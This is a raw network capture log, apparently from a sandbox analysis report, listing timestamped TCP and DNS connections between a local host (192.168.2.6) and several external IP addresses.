                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.625423908 CET50125443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:39.625436068 CET44350125159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.796952963 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.797838926 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.797866106 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.798860073 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.798937082 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.799371958 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.799424887 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.799541950 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.847335100 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.848800898 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.848819971 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:40.895814896 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.249603987 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.249635935 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.249722004 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.249823093 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.250978947 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.251943111 CET50126443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.251962900 CET4435012623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.257921934 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.257982969 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.258064032 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.258249044 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.258265972 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.356573105 CET44350125159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.356676102 CET44350125159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.356899977 CET50125443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.357068062 CET50125443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.357084990 CET44350125159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.362349987 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.362391949 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.362457991 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.362726927 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:41.362735033 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.532938004 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.533323050 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.533358097 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.533694983 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.534003973 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.534094095 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.534158945 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.575351954 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.813256979 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.813316107 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.814023972 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.814033985 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.815754890 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.815764904 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.997390985 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.997415066 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.997503042 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.997555971 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.997596025 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.998709917 CET50127443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:42.998737097 CET4435012723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.005072117 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.005115032 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.005181074 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.005382061 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.005388975 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.728792906 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.728883982 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.728948116 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.728969097 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.729197025 CET50128443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.729217052 CET44350128159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.730739117 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.730767965 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.730834007 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.731046915 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:43.731060028 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.283382893 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.283723116 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.283746004 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.284107924 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.284461975 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.284560919 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.284626007 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.327337980 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.747219086 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.747288942 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.747381926 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.747432947 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.747469902 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.748904943 CET50129443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.748934984 CET4435012923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.754712105 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.754741907 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.754802942 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.755002975 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:44.755018950 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.134217024 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.134272099 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.134799957 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.134809017 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.136621952 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.136631966 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.168023109 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.168116093 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.168165922 CET50080443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.247010946 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.247111082 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.247188091 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.450515032 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.450609922 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.450782061 CET50083443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.978777885 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.979130983 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.979166031 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.979465008 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.979877949 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.979933977 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:45.979933977 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.023329020 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.026993990 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.027070045 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.027182102 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.027182102 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.027419090 CET50130443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.027436018 CET44350130159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.031301022 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436459064 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436489105 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436496973 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436517954 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436562061 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436595917 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436609030 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436613083 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.436651945 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.439872026 CET50131443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.439889908 CET4435013123.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.445897102 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.445955038 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.445966959 CET50080443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.445986986 CET50083443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.445992947 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.445996046 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.446316004 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.446360111 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.446424007 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.446609974 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:46.446625948 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.778428078 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.778794050 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.778827906 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.779174089 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.779450893 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.779526949 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.779625893 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:47.823329926 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231389046 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231412888 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231458902 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231482029 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231501102 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231518984 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.231544018 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.243478060 CET50132443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:48.243505001 CET4435013223.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.101392031 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.101491928 CET44350111104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.101665020 CET50111443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.117068052 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.117158890 CET44350110104.70.121.169192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.117223978 CET50110443192.168.2.6104.70.121.169
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.380065918 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.380162954 CET44350114104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:51.380213976 CET50114443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:49.351084948 CET5961153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:49.494968891 CET53596111.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:39.472863913 CET4932053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:39.617135048 CET53493201.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:41.690742970 CET5102553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:41.836621046 CET53510251.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.485130072 CET53518741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.501774073 CET53546921.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.618365049 CET5476353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.618592978 CET5545053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.761471987 CET53547631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:57.761604071 CET53554501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:00.433440924 CET53572351.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.413615942 CET53549511.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.520979881 CET6263153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.521137953 CET4949053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:13.664563894 CET53494901.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:16.402141094 CET6177953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:16.402456045 CET5667753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.815097094 CET6451153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.815529108 CET5119453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.815819979 CET5683253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.816026926 CET5454153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.958517075 CET53645111.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.958939075 CET53511941.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.959202051 CET53545411.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.959400892 CET53568321.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.975914955 CET5723353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:17.976141930 CET6383753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.088332891 CET6023453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.089005947 CET6057653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.119803905 CET53638371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.119880915 CET53572331.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.171690941 CET5848853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.172724962 CET6526053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.232676983 CET53602341.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.232777119 CET53605761.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.309691906 CET5222553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.309890985 CET5038753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.423497915 CET5357653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.423686981 CET6481153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.453454018 CET53503871.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.565326929 CET6315353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.565684080 CET4919853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.567588091 CET53648111.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.708595037 CET53631531.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:18.808320045 CET53491981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.077723980 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.083760977 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.392354012 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:20.392556906 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.002348900 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.002408981 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.260718107 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.260827065 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.261802912 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.261977911 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.262063980 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.262470007 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.263873100 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.265137911 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.265224934 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.265235901 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.265464067 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.266103029 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.266412020 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.267504930 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.273542881 CET61891443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.338887930 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.339021921 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.559444904 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.573499918 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.600044012 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.600059032 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.600109100 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.600127935 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.600627899 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.600703001 CET54661443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.601828098 CET44354661162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.603862047 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.603950024 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.603959084 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.603967905 CET44361891172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:21.604199886 CET61891443192.168.2.6172.64.41.3
